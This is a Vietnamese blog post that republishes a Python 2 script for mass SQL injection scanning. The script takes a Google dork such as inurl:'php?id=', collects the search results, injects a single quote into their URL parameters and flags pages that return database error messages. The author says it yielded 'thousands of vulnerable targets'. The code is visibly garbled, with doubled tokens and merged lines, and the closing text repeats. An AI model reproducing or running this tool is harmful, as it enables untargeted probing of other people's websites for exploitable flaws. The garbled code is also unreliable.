Thứ Sáu, 16 tháng 8, 2013
SQL Injection Scanner
Here's the code:
#!/usr/bin/python # Copyright (C) 2010 <xrrrx@ymail.com> # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>.
from multiprocessing import Process from xgoogle.search import GoogleSearch, SearchError
from itertools import count
import urllib2from itertools import count import urllib2, sys, argparse
global strSQLi
strSQLi
strSQLi = ["error in your SQL syntax", # GENERIC
"Syntax error at", # GENERIC
"You have an error in your SQL", # MYSQL
"Division by zero in", # MYSQL
"not a valid MySQL result", # MYSQL
"Call to a member function", # MYSQL
"Microsoft JET Database", # MSACCESS
"ODBC Microsoft Access Driver" # MSACCESS
"Microsoft OLE DB Provider for SQL Server", # MSSQL
"Unclosed quotation mark", # MSSQL
"Microsoft OLE DB Provider for Oracle", # ORACLE
"Macromedia][SQLServer JDBC Driver]"] # COLDFUSION
def split(alist, wanted_parts=1):
length = len(alist)
return [ return [ alist[i*length // wanted_parts: (i+1)*length // wanted_parts]
for i in range(wanted_parts) ]
def checkSQLi(results, i):
# test single quote
for result in results[i]:
try:
if( try: if(args.verbose>='2'):
print print "[INFO] Testing URL: %s" % result.url
if not "=" in result.url:
if( if(args.verbose>='2'):
print print "[INFO] No params available for injection for: %s" % result.url
continue
response = urllib2.urlopen(result.url.replace("=", "='"))
html = response.read()
except Exception, e:
if( if(args.verbose>='1'):
print print "[ERROR] %s" % e
continue
except KeyboardInterrupt:
return return False
else:
if( if(checkSQLiStr(html)):
print print "[INFO] URL: %s" % result.url
print " Possible vulnerable!"
else:
if( if(args.verbose>='1'):
print print "[INFO] URL: %s" % result.url
print " Not vulnerable."
return False
def checkSQLiStr
def checkSQLiStr(html):
return return any(checkStr in html for checkStr in strSQLi)
def main():
tries = 0
while True:
try:
if( try: if(args.verbose>='1' and tries > 0):
print print "[WARNING] (%d) Retrying google search query" % tries
if(tries>=args.retry):
if( if(args.verbose>='1'):
print print "[ERROR] Maximum retries reached..."
sys.exit()
else:
else: tries = tries + 1
googleSearch googleSearch = GoogleSearch(args.keyword)
googleSearch.page = args.page
googleSearch googleSearch.results_per_page = 100
print args.keyword
for i in count():
allResults = googleSearch.get_results()
if if not allResults: # no more results (pages) were found
break
splitResults = split(allResults, args.threads)
processes = [Process(target=checkSQLi, args=(splitResults,i)) for i in range(args.threads)]
if( if(args.verbose>='1'):
print print "[INFO] Starting %d threads..." % args.threads
for p in processes:
p.start()
for for p in processes:
p.join()
tries = 0
print "Finished..."
sys.exit()
# finished
except SearchError, e:
if( if(args.verbose>='2'):
print print "[ERROR] Search failed: %s" % e
continue
except KeyboardInterrupt:
print print "Suspended by user..."
sys.exit()
if
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-v', dest='verbose', default='0', help='Verbosity level', choices='012')
parser.add_argument('-p', dest='page', type=int, default='0', help='Start google search from page')
parser.add_argument('-s', dest='stop', type=int, default='5', help='Stop at -s page')
parser.add_argument('-r', dest='retry', type=int, default='4', help='Amount of times to retry after google search timeout')
parser.add_argument('-t', dest='threads', type=int, default='2', help='Threads for checking SQLi in query results')
group = parser.add_argument_group('required arguments')
group.add_argument('-k', dest='keyword', help='Keywords to use on google query', required=True)
args = parser.parse_args()
print print "Starting..."
main()
sys.exit()
Required libraries:
http://argparse.googlecode.com/svn/trunk/argparse.py https://github.com/pkrumins/xgoogle (this one needs fixes,you can fix it yourself or download this one http://www.mediafire.com/?7a175lzzipm3x3s)
Usage:
usage: scanner.py [-h] [-v {0,1,2}] [-p PAGE] [-s STOP] [-r RETRY]
[-[-t THREADS] -k KEYWORD
optional arguments
optional arguments:
--h, --help show this help message and exit
--v {0,1,2} Verbosity level -p PAGE Start google search from page -s STOP Stop at -s page -r RETRY Amount of times to retry after google search timeout -t THREADS Threads for checking SQLi in query results
Example
Example: ./scanner.py -k 'somekeyword inurl:"php?id="' -t 5 -v 1
xargs can be used to feed google dorks from a file.
It basically scrape results from google with the keyword you input and try test for sql injection. It only checks for error based injections with single quote triggers, the idea was to add more injection methods, more search engines and other features, but I never continued the development, it still gave me thousands of vulnerable targets.
So if someone would like to improve it or add some feature please share it.
+ Lưu File Đó dưới dạng đuôi python ( *.py ).Phải cài Python trước để sử dụng..
+ Có Readme Kèm Theo + Example
+ Site Lỗi Sẽ Được Lưu Dưới Dạng Txt nằm cùng thư mục python bạn chạy
Nguồn: VNCno1
It basically scrape results from google with the keyword you input and try test for sql injection. It only checks for error based injections with single quote triggers, the idea was to add more injection methods, more search engines and other features, but I never continued the development, it still gave me thousands of vulnerable targets.
So if someone would like to improve it or add some feature please share it.
+ Lưu File Đó dưới dạng đuôi python ( *.py ).Phải cài Python trước để sử dụng..
+ Có Readme Kèm Theo + Example
+ Site Lỗi Sẽ Được Lưu Dưới Dạng Txt nằm cùng thư mục python bạn chạy
Nguồn: VNCno1
Chuyên Mục:
Code,
Hacking and Security,
Metasploit - Exploits,
Tools
Đăng ký:
Đăng Nhận xét (Atom)
Không có nhận xét nào: